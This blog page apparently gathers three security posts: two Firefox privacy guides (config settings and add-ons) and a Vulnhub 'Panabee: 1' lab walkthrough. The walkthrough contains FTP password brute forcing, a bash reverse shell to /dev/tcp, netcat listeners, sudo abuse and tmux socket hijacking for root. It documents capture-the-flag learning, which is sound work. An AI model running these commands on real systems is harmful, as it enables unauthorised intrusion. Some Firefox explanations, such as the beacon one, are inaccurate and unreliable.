Hacking Articles|Raj Chandel's Blog

Firefox for Pentester: Privacy and Protection Configurations

at 12:28 PM Tuesday, October 6, 2020 0 comments

Introduction

This is a second article in the series “Firefox for Pentester”. Previously we talked about how we can enhance the Privacy and Protection in Firefox using various add-ons and so, in this article we will become competent to protect ourselves online through the configuration options that Firefox provides us. In comparison to other browsers, Firefox protects our data and information the most. And we all know that Mozilla Firefox is plausibly the best browser available today. It provides privacy features, active development, amazing security, and the cherry on top is it has frequent updates. But we can still make it much more secure by modifying a few options.

Table of Content:

· Introduction

· Configuration Settings

· Isolating First Party Domains

· Preventing Browser Fingerprinting

· Enabling Tracking Protection (Browser Fingerprinting)

· Enabling Tracking Protection (Crypto Mining)

· Enabling Tracking Protection

· Blocking Ping Tracking

· Disabling URL Preloading

· Keeping Clipboard Private

· Disabling EME Media

· Restricting DRM Content

· Disabling Media Navigation

· Restricting Cookie Behaviour

· Control Referrer Header

· Restricting Referrer Header

· Restricting WebGL

· Disabling Session Restoring

· Disabling Beacon

· Securing Remote Downloads

· Firefox Prefetching

· Disabling IDN Punycode Conversion

· Conclusion

Configuration Settings

When playing with the configurations in Firefox, numerous elements should be examined. Every option should be understood well enough for the changes to be made as they will change the way you browse your internet. To make changes in configurations of Firefox, type “about:config” in the URL bar as shown in the image below:

Once the about:config page loads, it will show you a warning. The warning will state that from here on if you change anything then it will void your warranty and whatever changes you make will be at your own risk. To move forward from here left click on the “I accept the risk!” as shown in the image above. Once you click on the button, you will meet with the page shown in the image below. Here are all the options regarding online privacy and protection present.

Isolating first-party Domains

Through the first option, we will modify is “privacy.firstparty.isolate”. This built-in characteristic allows you to only access first-party domains. That means all the third-party domains that tag along the first-party domains are now blocked and cannot track your activity online or collect your data. All this is possible as it isolates the first-party domains from others and stores your data separately so that cross-origin tracking is nullified. Hence, third-party cookies, hidden cookies, data sharing, and other options will be disabled.

This option can be searched through the search bar. By default, this option is set to the value false i.e. it is disabled by default as messes up the authentication system of many websites. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to true. Setting the value from false to true will mean that you have now enabled this option. Once the option is enabled, the status of the option will be changed from default to modified as shown in the image below:

privacy.firstpart.isolate

Preventing browser fingerprinting

The next option is “privacy.resistFingerprinting”. To understand what this option does, let us first understand what is browser fingerprinting. Client-side scripting that allows the website to load in the browser permits browser fingerprinting. Through this, they collect the information about the browser, operating system, cache-control header, all kinds of headers, list of fonts, plugins that are being used, microphone, camera, etc. Hence, they are called cookie-less monsters. This process of browser foot-printing starts the moment a connection is made with the website. And these features are exploited through credential hijacking, data breaching, etc. All of this can be stopped by enabling the “privacy.resistFingerprinting” option in your browser.

privacy.resistFingerprinting

Enabling Tracking Protection (Browser Fingerprinting)

The next option that we are going to talk about is privacy.trackingprotection.fingerprinting.enabled . It works the same as the previous one. As this one too protects you from browser fingerprinting. Along with preventing tracking over the websites, it also prevents phishing attacks.

privacy.trackingprotection.fingerprinting.enabled

Enabling Tracking Protection (Crypto Mining)

The problem with crypto miners is that the calculations they do, require huge resources such as CPU, power, and RAM. These resources are expensive and not everyone can afford it. So, what hackers do is that they control systems of various people and carry out the deed of crypto mining from there system. So to stop your browser to fall victim to cryptomining all you have to do it enable the privacy.trackingprotection.cryptomining.enabled option.

privacy.trackingprotection.cryptomining.enabled

Enabling Tracking Protection

Our next option i.e. privacy.trackingprotection.enabled enables us to completely stay non-existent to the tracking that is done through the browser. Tracking is keeping a record of your internet searches, the website you visit, data you share, etc. and this option nullifies it by blocking every kind of tracking. It works on the disconnect.me filter list.

privacy.trackingprotection.enabled

Blocking Ping tracking

To understand the next option which is the browser.send_pings, let us first understand hyperlink auditing. It is a method of tracking where the HTML code makes your browser ping a specified URL. This URL is pinged upon the visitation of the website that you mean to visit. This method is of tracking is different from other methods as it doesn’t give users any kind of choice. It just runs in the background without the user knowing. So to shut this method of tracking, you have to go into the configuration of the Firefox and disable the browser.send_ping option. This option here makes sure that the browser blocks every kind of hyperlink auditing.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default as to allow hyperlink auditing. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

browser.send_pings

Disabling URL preloading

This browser.urlbar.speculativeConnect.enabled option helps us to control URL preloading. Whenever typing in the URL, halfway through the typing you must have noticed the auto-completion of the URL. This is known as URL preloading. How this works is when you start by typing a URL, it will send out domain queries so that it can carry on with auto-completion. And so, by disabling it, the preloading of URLs into the URL bar will stop. This helps to prevent the suggestions which you do not want or which can be presumed as insecure.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default. But if you are pro-privacy and anti-tracking like us then you should double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

browser.urlbar.speculativeConnect.enabled

Keeping Clipboard private

Whenever you copy, cut or paste anything from or to the website; it gets notified in detail so much as that they will know what part of the webpage you copied. This is done by keeping a track of your clipboard. Through the dom.event.clipboardevents.enabled option we can make sure that the websites do not track our data from the clipboard.

dom.event.clipboardevents.enabled

Disabling EME media

There have been many instances recorded where medias files have been downloaded. These files were proved to be encrypted when they downloaded their self, it was hard to detect them and their data. Firefox provides us with an option through which we can make sure nothing of such sorts happen.

This media.eme.enabled option is set to false by default. This means that no encrypted media will be download without the user’s permission. It can be searched through the search bar. If by any chance this option is enabled, make sure to disable it as soon as possible. And if it is disabled by default then the status of this configuration will remain default as shown in the image below:

media.eme.enabled

Restricting DRM content

The content you surf on the internet can never be trusted. Usually, when DRM based software’s are running on the website, they can have file-level control and even user-level control. The user-level control allows them to access, share, download, or print anything they desire. Therefore, you must be in control always. Even if your browser nags you to enable DRM content you shouldn’t fall for it because if you do not want to see it shouldn’t be able to see it. Firefox provides us with an option i.e. media.gmp-widevinecdm.enabled that allows you to restrict DRM content.

media.gmp-widevinecdm.enabled

Disabling Media Navigation

This option, if enabled will allow your browser to extract information from your system and present it to the websites you visit. The data collected from the system can be forwarded to the Third-party domains as well. The thing is if you allow this option then it will collect the information about the operating system, screen resolution, type of system, FrameRate, facingMode of the mobile devices, possible access to user media, etc. And to make it even worse, they can control permissions of the audio/visual tabs in the browser as well as access the camera or microphone. Hence, we all can come to an agreement that keeping this option enabled is a major threat. And to save us from the potential threats, we just have to disable the media.gmp-widevinecdm.enabled option.

media.navigator.enabled

Restricting Cookie Behaviour

There are various cookies generated when a website is visited. These cookies can be necessary which are used for the features of a website. And others are the unimportant cookies such as third-party cookies. These cookies are often the result of advertisements, widgets, and web analytics. They track your login information, shopping carts, language you use, etc. By default, the value for network.cookie.cookiebehaviour is set to 0. This value can be set between the numbers 0 to 4, where:

0 = accept all cookie values

1 = only accept from first-party domains

2 = block all cookies by default

3 = use p3p settings

4 = storage access policy: Block cookies from trackers

We will select value 1 here as we only want cookies from first-party domains.

network.cookie.cookieBehavior

This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:

Control Referrer Header

While browsing the internet, a referrer header is sent to the website which is requested. This header contains the information about the page where u previously was and from where did you request the next webpage. Usually, the Firefox will not send a referrer header from HTTPS to HTTP. Sending such information over a referrer header creates security issues as they can expose your personal information and private data. To put it simply using this option you will be able to control whether you want the referrer to be sent over the cross origins or not. Now, this data can send to different origin domains i.e. across origins. But Firefox’s built-in tracking protection provides a solution to it through network.http.referer.XOriginPolicy option. This value can be set between the numbers 0 to 2, where:

0 = send the referrer in all cases

1 = send referrer only when the base domains are the same

2 = send referrer only on the same origin

The default value of this option is 0 i.e. send the referrer in all cases and we will change its value to 2 i.e. send the referrer only to the same origin.

network.http.referer.XOriginPolicy

This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:

Restricting Referrer Header

With the previous configuration setting, we learned that we can control whether we want to send referrer headers across origins or not. Now there will be many situations where it will be necessary for you to send these referrer headers across origin or even in the same origin. Here, what you can do it restrict the header by controlling the elements of the header. The option network.http.referer.XOriginTrimmingPolicy allows us to do so. This value can be set between the numbers 0 to 2, where:

0 = send the full URL

1 = send the URL without its query string

2 = only send the origin

The default value of this option is 0 i.e. send the full URL and we will change its value to 2 i.e. only send the origin.

network.http.referer.XOriginTrimmingPolicy

This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:

Restricting WebGL

WebGL is an option provided by Firefox which turns every webpage into 3D graphics. Alas! It comes with various security flaws. It makes it possible for the attackers to target your graphic drivers along with GPU to extend of making your whole system useless. Whether you want to use such an option or not is left to user decision by Firefox when it introduced webgl.disable configurational setting. Through this option, you can disable the WebGL.

webgl.disabled

Disabling Session Restoring

There are times where the user experiences some crashes or power outages that cause the system to shut down. If the user has some URLs opened in the browser or logged in some application they are restored when the user restarts the system. Ever since the release of Firefox 2.0 this option is enabled by default. Some users feel that this is a good functionality that helps them recover data or sessions but this poses a security threat as the if the original intended user doesn’t restart the system or if this happens on a Public system than the person who accesses the system after the restart gains the potential access of that logged-in sessions and websites that the original user was browsing. This option contains 3 possible values.

0 = Store Extras Session data for any site

1 = Store Extra Session data for unencrypted (non-HTTPS) sites only

2 = Never store extra session data

The default value of this option is 0 i.e. Store the session data for any site and we will change its value to 2 i.e. Never store any data.

browser.sessionstore.privacy_level

This option can be searched through the search bar. Once the value of the option is changed, the status of the option will be changed from default to modified as shown in the image below:

Disabling Beacon

IEEE 802.12.4 says that beacon-enabled mode is to be applied through the network. It sends information about the personal network to the servers to inform them about the presence. This allows new devices to connect from time to time. It is useful to maintain network synchronization. But it not compulsory as it sends over the details about the network you are on.

This option can be searched through the search bar. By default, this option is set to the value true i.e. it is enabled by default. You can double left-click on this option to change its value to false. Setting the value from true to false will mean that you have now disabled this option. Once the option is disabled, the status of the option will be changed from default to modified as shown in the image below:

beacon.enabled

Securing Remote Downloads

By default, remote safe downloads are enabled in Firefox. And we have often talked about the instances where the file that is being downloaded seems genuine but instead, it can be a malware. And you can never be too sure. Using browser.safebrowsing.downloads.remote.enabled we can be a step closer to know we are downloading safe files and nothing is remotely tagging along with the file.

browser.safebrowsing.downloads.remote.enabled

Firefox Prefetching

As the name tells, prefetching in Firefox is done to speedily load webpages for the user. A browser can always summon the parameters beforehand that it knows will be used by the websites. These parameters contain data regarding resources to be used. Hence, at any point in time, they can be request and the browser will prefetch the required information for the user. The browser will foretell the domain names that you are most likely to visit which speeds up the process of domain name resolving. This option was developed to save time on the user end but it turned out to be a security concern. Firefox can prefetch things like DNS, network, IP address, etc.

This prefetching can be done via DNS (everything related to DNS) or HTTPS (HTTPS contents). And has been proved to be a security concern and so both DNS and HTTPs prefetching can be disabled via the following options:

network.dns.disablePrefetch

network.dns.disablePrefetchFromHTTPS

Both options are set to false by default. To disable these options, change them to true and there will be no DNS and HTTPS prefetching. Once these options are disabled, the status of these options will be changed to locked just as it is shown in the image below:

Another prefetcher that you can disable is network predictor. This option prefetch all the details related to the network that you are connected to. It can be disabled by setting it value to false. This value is set to be true by default. Once the change option’s value to false; its status is changed to modified as shown in the image below:

network.predictor.enabled

Another option to disable to disallow the browser to prefetch network details is network.predictor.enable-prefetch. This option is allowing all the network details to be prefetched as its name suggests. It can be disabled by setting it value to false.

network.predictor.enable-prefetch

The network.prefetch-next option allows certain links to be prefetched. This is done when the website lets the browser know that certain pages are likely to be visited. Therefore, the browser downloads them beforehand for the convenience of the users. It can be disabled by setting it value to false. This value is set to be true by default. Once the change option’s value to false; its status is changed to modified as shown in the image below:

network.prefetch-next

Disabling IDN Punycode Conversion

Before understanding this particular option, first, you need to understand the meaning of IDN support. IDN makes it possible for the website to register the domain names using the characters that are originated from their local or native language. To expand the support of these characters a new encoding was developed called “Punycode”. By default, the value network.IDN_show_punycode is false. This means IDN is enabled. But no matter how good a feature is, it can be abused. This was shown when in 2005 there was a huge rise in Spoofing and Phishing attacks using IDNs. This can be explained using the following example:

Original Domain: https://hackingarticles.in

Pishing Domain: https://hackingarticlés.in

Notice the é in the pishing domain. When this option is enabled it converts é to e so that users that don’t use é in their language can see it as simple e. But this conversion also makes it impossible for a user to visually differentiate between the genuine and phishing domains.

This value is set to be false by default. Once the change option’s value to true; its status is changed to modified as shown in the image below:

network.IDN_show_punycode

Conclusion

By enabling and disabling the configurations options provided by Firefox you can achieve privacy and protection online without using plug-ins. This is a safe procedure as the third-party domain cannot track you. If you are having issues with any particular web application or authentication or media with these options enabled/disabled then what you should do is create a container in Firefox by using a temporary container plugin or profiling that is provided by Firefox. So that you are safe and cross-origin tracking isn’t done in your browser. Hence your data and personal information are safe.

Panabee: 1: Vulnhub Walkthrough

at 11:52 AM Monday, October 5, 2020 0 comments

Introduction

Today we are going to crack this vulnerable machine called Panabee: 1. It is created by ch4rm. He is available on Twitter by handle aniqfakhrul. This is a Boot to root kind of challenge. We need to get root privileges on the machine and read the root flag to complete the challenge. Overall it was an intermediate machine to crack.

Download Lab from here.

Penetration Testing Methodology

· Network Scanning

o Nmap Port Scan

· Enumeration

o Browsing HTTP Service

o Enumerating SMB Service

o Bruteforcing FTP Credentials

o Enumerating FTP Service

· Exploitation

o Exploiting File Upload Vulnerability

· Post Exploitation

o Enumerating Sudo Permissions

o Uploading Malicious Script

o Getting Jenny User Session

o Downloading pspy64 script

o Running pspy64 script

· Privilege Escalation

o Exploiting tmux for Root

· Reading Root Flag

Walkthrough

Network Scanning

The IP Address of the machine is found to be 192.168.0.165. To move forward we need to find the services that are running on the machine. We can achieve this using a nmap Aggressive scan. Nmap reveals a lot of services. We have the FTP (21), SSH (22), SMTP (25), HTTP (80), NetBIOS (139, 445).

nmap -p- -A 192.168.0.165

Enumeration

We start with the Enumeration stage. First Service we decided to take a look was HTTP. Upon looking at the IP Address in Web Browser we see a Apache2 Default Page. Nothing special to look here.

After this, Next service we decided to enumerate was SMB. We connected to the service using the smbclient tool. Here we see the bunch of shares that are hosted on the machine. The share “note” seemed to be worth looking into. We reconnect to that share. Here we find a text file by the same name. We download the text file onto our local system using the get command. We read the text file it was addressed to goper. Cool a username. The note aplogieses for a late response and mentions the server will backup whatever the files that are into the home directory of the user goper.

smbclient -L \\192.168.0.165

smbclient \\\\192.168.0.165\note

get note.txt

exit

cat note.txt

Since there is a user on the machine by the name of goper. It is possible that goper has the access to the FTP service. The issue with this theory that we are still unaware for a password for the user goper. This is where we thought that Bruteforcing is a good idea. We used the rockyou wordlist and Hydra as the tool to bruteforce. In few seconds it was in front of us that the password for the user goper is spiderman. My spider senses are tingling here. Let’s take a look inside the FTP service.

hydra -l goper -P /usr/share/wordlists/rockyou.txt 192.168.0.165 ftp

We connect to FTP service using the credentials that we just found. Here we have a python file by the name of status. We downloaded the status.py to our local system to take a closer look at it. A simple look on the script tells us all this does is send ping packets to the server or home IP Address and writes the Status that Server is up or down in a file status.txt inside the user jenny’s home directory. Cool another user.

ftp 192.168.0.165

get status.py

bye

cat status.py

Exploitation

Since there is a backup functionality and FTP service that means we can upload files to the target machine as the user goper. This makes this simple. We can create a simple bash reverse shell and upload it using the FTP service and get a session on target machine. We created a shell file as shown in the image below.

#!/bin/bash

bash -i >& /dev/tcp/192.168.0.147/8080 0>&1

Now we connect to the FTP service again and we upload the backup.sh payload file using the put command. The upload was successful.

ftp 192.168.0.165

goper

put backup.sh

Post Exploitation

We started the netcat listener to capture the session generated by payload. We get the session in a few moments. After getting the session, we use the sudo -l command to check for the binaries that can be used to escalate the privilege on the target machine. We can see that we can execute the status.py file with root permissions as jenny user. That means we need to first replace the status.py with a reverse shell and get a session as jenny user.

nc -lvp 8080

sudo -l

We created a reverse python shell targeting port 8888 of our local machine.

Now we need to send this file to the Target machine. For this we will be using the FTP service. Now that we have uploaded a shell file but it wont have the execution privileges. For this we will use the chmod command from the FTP shell as shown in the image below.

put status.py

chmod 777 status.py

Now we create the listener on the port 8888 and get back to the session we have as the goper user. Here we will execute the file we just uploaded as jenny user.

sudo -u jenny /usr/bin/python3 /home/goper/status.py

We get back to the listener we created. Here we can see that we have a session as jenny. We move to the tmp directory as it has write permissions. Then we download the pspy64 script on the target machine. We provide it with proper permissions and execute it.

nc -lvp 8888

python3 -c 'import pty; pty.spawn("/bin/bash")'

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64

chmod 777 pspy64

./pspy64

We see that there are processes related to tmux server. This means that it is possible to get the root using tmux.

We also take a look at the history and find that a lot of tmux was used. This command shows that a session of tmux is being shared. We can also see that tmux default is located in the opt directory.

Privilege Escalation

To get root from tmux is not that difficult of a task. If you are not familiar to tmux or getting root as tmux, check our article here. We need to Export the Term to xterm to execute it using tmux. Now use the tmux to attach the default socket.

export TERM=xterm

tmux -S /opt/.tmux-0/sockets/default attach

Now that tmux is executed with set the TERM to xterm and we have the root privilege as shown in the image below. Now, we will traverse into the root directory to read the root flag. This concludes this box.

cd /root

cat proof.txt

Firefox for Pentester: Privacy and Protection Add-ons

at 9:48 AM Sunday, October 4, 2020 0 comments

In today’s article, we will facilitate ourselves with the skill of protecting us online. Firefox is a web browser developed by Mozilla. With its latest quantum update, it provides us with improved speed and unique design. Firefox is an amazing web browser, its user friendly and customizable. When we talk about penetration testers or security analysts; Firefox is the go-to browser for it. It has various add-ons that help us to protect us online and allow us to have some privacy post-Snowden revelations. The internet is the big unknown and the most non-trustable world in itself. Every month or so there are data breaches and malware attacks such as ransomware and other than this you are never secure. Various websites poach your data, personal information, etc. Accidentally stumbling upon an ad and then being bombarded with it. Now, if you are looking to get away from all this, then this article is the answer for you. But before can talk about the various add-on that helps us to stay protected, we will talk about profiling in Firefox.

Table of Content:

· Profiling in Firefox

· Plug-ins

o uBlock Origin

o uMatrix

o HTTPS Everywhere

o Privacy settings

o No Script

o Privacy Badger

o Decentraleyes

o Terms of Service: Didn’t Read

o Snowflake

o Temporary Containers

Profiling in Firefox

In Firefox, you can create various profiles according to your needs in the browser as these profiles are customizable. For instance, you can have one profile for research purposes and others for VAPT. Creating these profiles is convenient and quite easy. To create a profile, open your Firefox browser and type “about:profiles” in the URL tab. Then simply left-click on “Create New Tab”. as shown in the image below:

Once you click on “Create New Profile”, a dialogue box will open. Fill the name of the profile you want like here like we gave “Research_division”. After that click on the “Finish” button and the profile will be created.

Similarly, you can create as many profiles as you want with different names depending on your needs. In the image below you can see that we have created yet another profile by the name of Privacy and Protections. The default location of every profile in windows is C:\Users\%username%\AppData\Roaming\Mozilla\Firefox\Profiles and in Linux the path will be /root.mozilla/firefox/. Privacy and Protection (as shown in the image below) but you can always change it as per your desire.

Both of our profiles are created as we wanted with individual personalization, just as shown in the image below. These profiles separates all the information, plug-ins, and settings from one another. Once all the profiles are created it will give you an option whether you want to set a profile as default or launch it in new browser window. You can also rename or remove the profiles. It also gives you an option to directly open the directly where the profiles are located. You will find both root directory and local directory paths there.

Plug-ins

uBlock Origin

uBlock is created by Raymond Hill. It is an open-source extension. It blocks all the advertisement generally and especially the ones which can potentially be malicious. It even filters out the URL of various advertisement which use trackers to pursue your preferences and information. The major feature of this amazing ad blocker is that it even blocks the latest tracking techniques such as CNAMEs. When you traverse yourself from website to website, uBlock stops one website to share your data with another. This technique of websites sharing data with each other is harder to pinpoint with other ad blockers as this particular issue remains but, with uBlock origin; this is not a problem. Along with all this, it also blocks pop-ups, cosmetic ads, remote fonts, even disables JavaScript. Bonus to this, it removes Youtube ads too.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

uMatrix

uMatrix is an add-on created by Raymond Hill as well. This add-on was developed to easily control your web-content i.e. you can permit what will load on your browser and what not. This add-on works like a firewall prevents the websites to use your cookies and it protects you from malware, trackers, bloatware, etc. the important thing to remember, as the data loads in the browsers, is that as this add-on blocks tracker and disallow unnecessary codes to execute themselves; it increases internet and page load up speed. Even the bandwidth consumption improves. uMAtrix takes precautional steps and blocks third-party domain which makes it difficult to access some sites but that can be controlled depending on your demands. Things that you can control via uMatrix are:

· Cookies

· CSS

· Image

· Media

· Scripts

· XHR

· Frame

HTTPS Everywhere

There are a multitude of websites all over the internet that does not have SSL layer protection. Almost all of these are used as a decoy to hack or are prone to the Man In The Middle (MITM) attacks itself. Upon surfing the web, you can never be sure which website is which and whether it is safe to browse them. Hence, HTTPS Everywhere is the answer to this problem as it protects from such online threats. This browser extension provides you with an SSL/TSL layer of protection across the internet. This layer of protection enables you to encrypt whatever the information is sent or received from the website, which makes you data safe from attacks like spoofing, sniffing, MITM, etc.

Privacy Settings

This extension is developed by Jeremy Schomery. This is the most convenient extension as it brings all the privacy settings options together in one place. All the settings can be adjusted from the pop-menu of the extension. It has a tool panel for all our preferences. To provide you with privacy this extension makes sure that no data is sent to a third-party website.

NoScript Security Suite

NoScript Security Suite is developed by Giorgio Maone. It is referred to as a suite as it provides various security measures for both developers and security analysts. To be entirely secure, many security analysts argue that disabling JavaScript on the browser is an important practice. There are few but major browser vulnerabilities that exploit JavaScript to attack the target. Although almost all the websites try and make themselves secure from these vulnerabilities. But one can never be too sure. It’s a fool's errand to be entirely dependent on others for your protection. So, to protect themselves from their end comes to play too. And this extension helps us in achieving the said. NoScript helps to control the disabling the JavaScript as easily as possible. Here, it is important to note that many people will proclaim that today's browsers provide us with the option of disabling JavaScript, then why do we need this extension? Here, the point to be noted is that this option is limited (limitation depends on the browser) and you cannot control it as you can with NoScript. This extension actively blocks executable content which is dismissed all over the world. It also provides security against known security exploits. Most importantly it offers client-side security by giving security against cross-site scripting (XSS) and HTML injections as it identifies the malicious request and neutralizes it. This extension also brings Application Boundaries Enforcer, this enforcer works like a firewall, and the policies of this firewall can be defined by the user. It guards the entry point of the browser which in turn helps the user to be safe from the attacks like CSRF and DNS rebinding. Anti-Clickjacking and HTTPS enhancement is also provided by this superb extension.

Privacy Badger

This add-on is developed by EFF Technologists and they have done amazing work with this add-on. While surfing the internet, privacy is a must. But there is a swarm of tracking ads, clickbait ads, etc. online that interrupt your smooth surfing and bait you to fall victim to these without even knowing. The worst part is there is hardly a way to find out whether you are being tracked or not. We can simply identify the evidence, such as if you search for something online; be sure as hell that you are going to see ads regarding it for a long time, and hence the online tracking. The privacy badger extension comes handy here. This extension is praised as it blocks cookies that track you even if you delete them and it blocks third-party tracking too. Some third-party domains are required for the site to load itself, this requirement can be of maps, images, etc. Here, this tool will analyze it and allow the important requirements and disallow the tracking cookies and referrers. The cookies that have a tracking id or are hidden are not allowed because of this add-on. It even identifies super cookies that keep a track of you. The add-on works in incognito mode as well and allows you to whitelist the domains. The feature of whitelisting the domains is provided so that if you want to allow a tracking domain you can allow it as your requirement. This tool works by identifying the domain's behavior and it also has a yellow list. This yellow list contains the name of the websites that are surely collecting your data and tracking you.

Decentraleyes

Decentrelayes is developed by Thomas Reintjes. This is a wonderful add-on and must have you are serious about privacy and protection. Usually while browsing the internet, you are connected to public Content Delivery Network. This connection allows you to access important and necessary javascript libraries that allow the content to be loaded on your webpage. Now here is the thing, being constantly connected to public CDNs is insecure in terms of privacy and tracking and it’s a pickle because you can’t surf the net without such libraries. To all these problems, Decentrelayes is the solution. To server, you with the motto of privacy and anti-tracking Decenterelayes takes the necessary libraries and store them on your local machine. This way when you are online, you don't need to be connected to public CDNs as you can use the local ones. The fourteen JavaScript libraries provided by Decentrelayes are:

· AngularJS

· Backbone.js

· Dojo

· Ember.js

· Ext Core

· JQuery

· JQuery UI

· Modemizr

· MooTools

· Prototype

· Scriptaculous

· SWFObject

· Underscore.js

· Web Font Loader

And the list of networks supported by this marvelous extension is as following :

· Google Hosted Libraries

· Microsoft Ajax

· Cloudflare

· JSDelivr

· Yandex CDN

· Baidu CDN

· Sina Public Resources

· UpYun libraries

It works by analyzing HTML code. After studying the HTML data, it will take the public CDNs and swap it with the local ones that it provides. This way the request to the external CDN is never sent from the browser. Hence, they can’t track your online activity or access your data.

Terms of Service; Didn’t Read

Terms of Service; Didn’t Read is a browser extension developed by Abdullah Diaa, Hugo, Michiel de Jong. The name of the extension is a wordplay on the phrase “Too long; Didn’t Read”. This is the simplest and yet most important extension. When it comes to Terms and Services of a website, nobody wastes time in click "I Agree" or "I Accept". The sheer quantity and complicated text confuse everybody. We all do it but none of us has the tiniest bit of idea what we are agreeing to. Hence, this extension. This add-on comes handy as it grades the Terms of Services provided by various websites. These grades are from A to E; where A is best and E is worst. It also reviews the privacy policies as positive, negative, and neutral. Now after knowing the gest of Terms of Services through this extension, it is wholly on the user whether to access the website or not. The purpose of this add-on is to aware of the user of the authenticity of the sites that they are using and letting them know about the policies and what they are agreeing to; just so they can form an opinion and decide whether they want to continue or not. According to us, this is a must-have extension as different exploitation in terms of identity theft, data collection, accessing personal information, etc through Terms of Services unveils every other day.

Snowflake

Snowflake extension is created by The Tor Project. It was developed to give easy access to the Tor Network after the governments banned Tor bridges. As it is the Tor network, it allows you to be anonymous on the internet; all the while protecting your data and identity. This web browser extension allows you to tap into the tor network through a proxy and this network has multitudes of servers. The entry points to these servers are known as tor bridge and there are Tor relays too that bounce the traffic and helps one to stay anonymous as long as they are surfing. As it allows you to stay anonymous, you are protected against tracking and even your data could not be collected. It also helps with hiding IP address.

To add this extension in your browser, simply open your browser. And then search for the particular extension. From the extension store, click on the "Add to Firefox" button and then again, from the pop-up dialogue box click on the "add button" as shown in the image below. The extension will be added to your browser. And you can customise the settings of the extension from the extension widget on the right-hand side of the URL tab.

Temporary Containers

When you browse the internet traditionally, it saves all your cookies and cache in a single place. This makes it easy for them to steal our data, intrude on our privacy, and track us. But if you separately contain all this somewhere then the problem will be solved. And it is possible to do so with Temporary Containers. It allows you to create a container through which you can surf the internet without worry about being tracked. The containers created by this extension are secluded as it aims to segregate the data from the rest of the browser. These containers are the same as basic profiling provided by Firefox (as mentioned at the start of this article). And by combining both profiling and this Temporary Containers browser extension, your browser will create a secure and safer environment for you to surf through the internet as the containers are removed when the last tab is closed and so its data. Automatic or manual; both modes are supported by it.

Conclusion

Major social media, shopping websites, and other webpages track you through your likes and dislikes, along with your location. Maintain a log of your every online activity. They even track the things that you start to write but do not post to track your self-censorship. And these are just a few things that we have mentioned. To get a better sense of internet tracking you can read this article here. And using all such add-ons, you can be safe and secure online by accessing quick and secure internet with amplified protection.

All of these Add-ons are open source and free to use. These are trustable Add-ons that provide security and privacy to any user using it. The best thing is all of these can be customised to the user's needs and requirements. Using these extensions consciously and properly will make you non-existent as far as the online tracking goes.

Pages

Hacking Articles|Raj Chandel's Blog

Firefox for Pentester: Privacy and Protection Configurations

Panabee: 1: Vulnhub Walkthrough

Firefox for Pentester: Privacy and Protection Add-ons

Labels

Popular Posts